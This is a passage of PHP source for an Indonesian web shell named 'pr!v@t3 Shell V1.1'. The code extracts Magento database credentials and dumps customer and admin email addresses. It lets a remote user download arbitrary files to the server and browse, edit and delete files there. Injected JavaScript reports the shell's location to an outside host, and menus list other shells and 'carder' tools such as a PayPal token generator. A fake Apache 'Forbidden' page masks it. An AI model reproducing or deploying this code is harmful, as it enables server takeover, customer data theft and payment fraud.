3490. $shc = file_get_contents($location);
3491. return $shc;
3492. }
3493. public function dpremove($data){
3494. $shcUniX = array_unique($data);
3495. return $shcUniX;
3496. }
3497. public function count($data){
3498. return "------------ Total Email : [ ".count($data) . " ]------------\r\n";
3499. }
3500. public function dbmagento($data){
3501. $shc_regexhost = "/<host><![CDATA[]+(.*?)[]]]><\\/host>/";
3502. $shc_regexusername = "/<username><![CDATA[]+(.*?)[]]]><\\/username>/";
3503. $shc_regexpassword = "/<password><![CDATA[]+(.*?)[]]]><\\/password>/";
3504. $shc_regexdatabase = "/<dbname><![CDATA[]+(.*?)[]]]><\\/dbname>/";
3505. preg_match($shc_regexhost, $data, $shcleak_1);
3506. preg_match($shc_regexusername, $data, $shcleak_2);
3507. preg_match($shc_regexpassword, $data, $shcleak_3);
3508. preg_match($shc_regexdatabase, $data, $shcleak_4);
3509. $shc_host = $shcleak_1[1];
3510. $shc_user = $shcleak_2[1];
3511. $shc_pass = $shcleak_3[1];
3512. $shc_db = $shcleak_4[1];
3513. $shc_json = array(
3514. 'host' => $shc_host,
3515. 'username' => $shc_user,
3516. 'password' => $shc_pass,
3517. 'database' => $shc_db,
3518. );
3519. return json_encode(array('shc_db' => $shc_json)
3520. );
3521. }
3522. public function shc_dbg($data){
3523. $jdata = json_decode(shc::dbmagento($data),true);
3524. if($jdata['shc_db']['host']=="localhost"){
3525. echo '<br><center> Host : <font color="red">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center> <br>';
3526. }else{
3527. echo '<br><center>Host : <font color="green">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center><br>';
3528. }
3529. mysql_connect($jdata['shc_db']['host'], $jdata['shc_db']['username'],$jdata['shc_db']['password']);
3530. mysql_select_db($jdata['shc_db']['database']);
3531. $query = array(
3532. 'admin_user' => 'SELECT * FROM admin_user' ,
3533. 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' ,
3534. 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,
3535. 'customer_entity' => 'SELECT * FROM customer_entity' ,
3536. 'newsletter_subscriber' => 'SELECT * FROM newsletter_subscriber' ,
3537. 'newsletter_template' => 'SELECT * FROM newsletter_template' ,
3538. 'sales_flat_order_address' => 'SELECT * FROM sales_flat_order_address' ,
3539. 'sales_flat_quote' => 'SELECT * FROM sales_flat_quote' ,
3540. 'sales_recurring_profile' => 'SELECT * FROM sales_recurring_profile'
3541. );
3542.  
3543. $shcolom = array(
3544. 'admin_user' => 'email' ,
3545. 'aw_blog_comment' => 'email' ,
3546. 'core_email_queue_recipients' => 'recipient_email' ,
3547. 'customer_entity' => 'email' ,
3548. 'newsletter_subscriber' => 'subscriber_email' ,
3549. 'newsletter_template' => 'template_sender_email' ,
3550. 'sales_flat_order_address' => 'email' ,
3551. 'sales_flat_quote' => 'customer_email' ,
3552. 'sales_recurring_profile' => 'SELECT * FROM admin_user'
3553. );
3554. foreach ($query as $shc_key => $shc_query) {
3555. $hasil = mysql_query($shc_query);
3556. while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
3557. $mail[] = $kolom_db[$shcolom[$shc_key]];
3558. }
3559. }
3560. return shc::dpremove($mail);
3561. }
3562. }
3563. error_reporting(0);
3564. file_put_contents($_GET['shcpatch'], file_get_contents($_GET['shcpatchl']));
3565. if($_POST['submit']){
3566. $data = shc::get($_POST['shcpatch']);
3567. $data = shc::shc_dbg($data);
3568. shc ::count($data);
3569. foreach ($data as $value) {echo $value."\r\n";}
3570. echo '
3571. <center><br>
3572. <textarea class="boxclose" style="margin: 0px; width: 527px; height: 172px;">
3573. </textarea><br>
3574. </center>';
3575. }
3576. if($_GET['x']=="d"){
3577. shc::drop();
3578. }
3579. echo '
3580. <script type="text/javascript">
3581. $(document).ready(function(){
3582. $.post("http://shor7cut.today/ip.php",
3583. {patch: document.URL},
3584. function(data,status){
3585. });
3586. });
3587. </script>';
3588. }elseif($_GET['do'] == 'tentang'){
3589. echo "<center>";
3590. echo '<pre>';
3591. echo "<h2>pr!v@t3 Shell V1.1 / N45HT Shell v1.1</h2>";
3592. echo "<p>Shell ini adalah hasil recode dari Shell Extreme Crew</p>";
3593. echo "<p>Dalam v1.1, juga ditambahkan beberapa Fungsi Exploit. Silahkan di check sendiri</p>";
3594. echo "<p>Terima kasih buat <strong>Extreme Crew - IndoXploit - K2LL33D - Mr.P-teo</strong> yang telah dengan senang hati memperbolehkan menambah atau mengurangi isi coding nya";
3595. echo "<p>Jika Anda mempunyai tools (Web Based Only) ingin di 'open sourcekan', bisa kirim melalui email : palsufake1@gmail.com</p>";
3596. echo "<p>Let's Play With this Web Shell ^_^</p>";
3597. echo "<p>Big Thanks For : </p>";
3598. echo "<p>[! Extreme Crew - IndoXploit - K2LL33D - Mr.P-teo - N45HT - iTeens - Defacer Tersakiti Team - BackBox Team !]</p>";
3599. } elseif($_GET['act'] == 'newfile') {
3600. if($_POST['new_save_file']) {
3601. $newfile = htmlspecialchars($_POST['newfile']);
3602. $fopen = fopen($newfile, "a+");
3603. if($fopen) {
3604. $act = "<script>window.location='?bom&act=edit&folder=".$dir."&file=".$_POST['newfile']."';</script>";
3605. } else {
3606. $act = "<font color=red>permission denied</font>";
3607. }
3608. }
3609. echo $act;
3610. echo "<form method='post'>
3611. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
3612. <input type='submit' name='new_save_file' value='Submit'>
3613. </form>";
3614. } elseif($_GET['act'] == 'newfolder') {
3615. if($_POST['new_save_folder']) {
3616. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
3617. if(!mkdir($new_folder)) {
3618. $act = "<font color=red>permission denied</font>";
3619. } else {
3620. $act = "<script>window.location='?bom&folder=".$dir."';</script>";
3621. }
3622. }
3623. echo $act;
3624. echo "<form method='post'>
3625. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
3626. <input type='submit' name='new_save_folder' value='Submit'>
3627. </form>";
3628. } elseif($_GET['act'] == 'rename_dir') {
3629. if($_POST['dir_rename']) {
3630. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
3631. if($dir_rename) {
3632. $act = "<script>window.location='?bom&folder=".dirname($dir)."';</script>";
3633. } else {
3634. $act = "<font color=red>permission denied</font>";
3635. }
3636. echo "".$act."<br>";
3637. }
3638. echo "<form method='post'>
3639. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
3640. <input type='submit' name='dir_rename' value='rename'>
3641. </form>";
3642. } elseif($_GET['act'] == 'delete_dir') {
3643. if(is_dir($dir)) {
3644. if(is_writable($dir)) {
3645. @rmdir($dir);
3646. @exe("rm -rf $dir");
3647. @exe("rmdir /s /q $dir");
3648. $act = "<script>window.location='?bom&folder=".dirname($dir)."';</script>";
3649. } else {
3650. $act = "<font color=red>could not remove ".basename($dir)."</font>";
3651. }
3652. }
3653. echo $act;
3654. } elseif($_GET['act'] == 'view') {
3655. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3656. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
3657. } elseif($_GET['act'] == 'edit') {
3658. if($_POST['save']) {
3659. $save = file_put_contents($_GET['file'], $_POST['src']);
3660. if($save) {
3661. $act = "<font color=lime>Saved!</font>";
3662. } else {
3663. $act = "<font color=red>permission denied</font>";
3664. }
3665. echo "".$act."<br>";
3666. }
3667. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3668. echo "<form method='post'>
3669. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
3670. <input type='submit' value='Save' name='save' style='width: 500px;'>
3671. </form>";
3672. } elseif($_GET['act'] == 'rename') {
3673. if($_POST['do_rename']) {
3674. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
3675. if($rename) {
3676. $act = "<script>window.location='?bom&folder=".$dir."';</script>";
3677. } else {
3678. $act = "<font color=red>permission denied</font>";
3679. }
3680. echo "".$act."<br>";
3681. }
3682. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3683. echo "<form method='post'>
3684. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
3685. <input type='submit' name='do_rename' value='rename'>
3686. </form>";
3687. } elseif($_GET['act'] == 'delete') {
3688. $delete = unlink($_GET['file']);
3689. if($delete) {
3690. $act = "<script>window.location='?bom&folder=".$dir."';</script>";
3691. } else {
3692. $act = "<font color=red>permission denied</font>";
3693. }
3694. echo $act;
3695. } else {
3696. if(is_dir($dir) === true) {
3697. if(!is_readable($dir)) {
3698. echo "<font color=red>can't open directory. ( not readable )</font>";
3699. } else {
3700. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
3701. <tr>
3702. <th class="th_home"><center>Name</center></th>
3703. <th class="th_home"><center>Type</center></th>
3704. <th class="th_home"><center>Size</center></th>
3705. <th class="th_home"><center>Last Modified</center></th>
3706. <th class="th_home"><center>Owner/Group</center></th>
3707. <th class="th_home"><center>Permission</center></th>
3708. <th class="th_home"><center>Action</center></th>
3709. </tr>';
3710. $scandir = scandir($dir);
3711. foreach($scandir as $dirx) {
3712. $dtype = filetype("$dir/$dirx");
3713. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
3714. if(function_exists('posix_getpwuid')) {
3715. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
3716. $downer = $downer['name'];
3717. } else {
3718. //$downer = $uid;
3719. $downer = fileowner("$dir/$dirx");
3720. }
3721. if(function_exists('posix_getgrgid')) {
3722. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
3723. $dgrp = $dgrp['name'];
3724. } else {
3725. $dgrp = filegroup("$dir/$dirx");
3726. }
3727. if(!is_dir("$dir/$dirx")) continue;
3728. if($dirx === '..') {
3729. $href = "<a href='?bom&folder=".dirname($dir)."'>$dirx</a>";
3730. } elseif($dirx === '.') {
3731. $href = "<a href='?bom&folder=$dir'>$dirx</a>";
3732. } else {
3733. $href = "<a href='?bom&folder=$dir/$dirx'>$dirx</a>";
3734. }
3735. if($dirx === '.' || $dirx === '..') {
3736. $act_dir = "<a href='?bom&act=newfile&folder=$dir'>newfile</a> | <a href='?bom&act=newfolder&folder=$dir'>newfolder</a>";
3737. } else {
3738. $act_dir = "<a href='?bom&act=rename_dir&folder=$dir/$dirx'>rename</a> | <a href='?bom&act=delete_dir&folder=$dir/$dirx'>delete</a>";
3739. }
3740. echo "<tr>";
3741. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
3742. echo "<td class='td_home'><center>$dtype</center></td>";
3743. echo "<td class='td_home'><center>-</center></th></td>";
3744. echo "<td class='td_home'><center>$dtime</center></td>";
3745. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
3746. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
3747. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
3748. echo "</tr>";
3749. }
3750. }
3751. } else {
3752. echo "<font color=red>can't open directory.</font>";
3753. }
3754. foreach($scandir as $file) {
3755. $ftype = filetype("$dir/$file");
3756. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
3757. $size = filesize("$dir/$file")/1024;
3758. $size = round($size,3);
3759. if(function_exists('posix_getpwuid')) {
3760. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
3761. $fowner = $fowner['name'];
3762. } else {
3763. //$downer = $uid;
3764. $fowner = fileowner("$dir/$file");
3765. }
3766. if(function_exists('posix_getgrgid')) {
3767. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
3768. $fgrp = $fgrp['name'];
3769. } else {
3770. $fgrp = filegroup("$dir/$file");
3771. }
3772. if($size > 1024) {
3773. $size = round($size/1024,2). 'MB';
3774. } else {
3775. $size = $size. 'KB';
3776. }
3777. if(!is_file("$dir/$file")) continue;
3778. echo "<tr>";
3779. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?bom&act=view&folder=$dir&file=$dir/$file'>$file</a></td>";
3780. echo "<td class='td_home'><center>$ftype</center></td>";
3781. echo "<td class='td_home'><center>$size</center></td>";
3782. echo "<td class='td_home'><center>$ftime</center></td>";
3783. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
3784. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
3785. echo "<td class='td_home' style='padding-left: 15px;'><a href='?bom&act=edit&folder=$dir&file=$dir/$file'>edit</a> | <a href='?bom&act=rename&folder=$dir&file=$dir/$file'>rename</a> | <a href='?bom&act=delete&folder=$dir&file=$dir/$file'>delete</a> | <a href='?bom&act=download&folder=$dir&file=$dir/$file'>download</a></td>";
3786. echo "</tr>";
3787. }
3788. echo "</table>";
3789. if(!is_readable($dir)) {
3790. //
3791. } else {
3792. echo "<hr>";
3793. }
3794. echo "<center><form>
3795. <select onchange='if (this.value) window.open(this.value);'>
3796. <option selected='selected' value=''> Tools Creator </option>
3797. <option value='$ling=wso'>WSO 2.8.1</option>
3798. <option value='$ling=injection'>1n73ction v3</option>
3799. <option value='$ling=wk'>WHMCS Killer</option>
3800. <option value='$ling=adminer'>Adminer</option>
3801. <option value='$ling=b374k'>b374k Shell</option>
3802. <option value='$ling=b374k323'>b374k 3.2</option>
3803. <option value='$ling=bh'>BlackHat Shell</option>
3804. <option value='$ling=dhanus'>Dhanush Shell</option>
3805. <option value='$ling=r57'>R57 Shell</option>
3806. <option value='$ling=encodedecode'>Encode Decode</option>
3807. <option value='$ling=r57'>R57 Shell</option>
3808. </select>
3809. <select onchange='if (this.value) window.open(this.value);'>
3810. <option selected='selected' value=''> Tools Carder </option>
3811. <option value='$ling=extractor'>DB Email Extractor</option>
3812. <option value='$ling=promailerv2'>Pro Mailer V2</option>
3813. <option value='$ling=bukalapak'>BukaLapak Checker</option>
3814. <option value='$ling=tokopedia'>TokoPedia Checker</option>
3815. <option value='$ling=tokenpp'>Paypal Token Generator</option>
3816. <option value='$ling=mailer'>Mailer</option>
3817. <option value='$ling=gamestopceker'>GamesTop Checker</option>
3818. </select>
3819. <noscript><input type='submit' value='Submit'></noscript>
3820. </form>";
3821. echo "<center>Copyright &copy; ".date("Y")." - <a href='?bom&folder=$dir&do=tentang'>pr!v@t3</a></center>";
3822. }
3823. echo "</html>";
3824. }
3825. else
3826. {
3827. echo "<h1>Forbidden</h1><p>You dont't have permission to access ".$dir." on this server.</p><hr>
3828. <address>Apache Server at ".gethostbyname($_SERVER['HTTP_HOST'])." Port 80</address></body></html>";
3829. return false;
3830. }
3831. ?>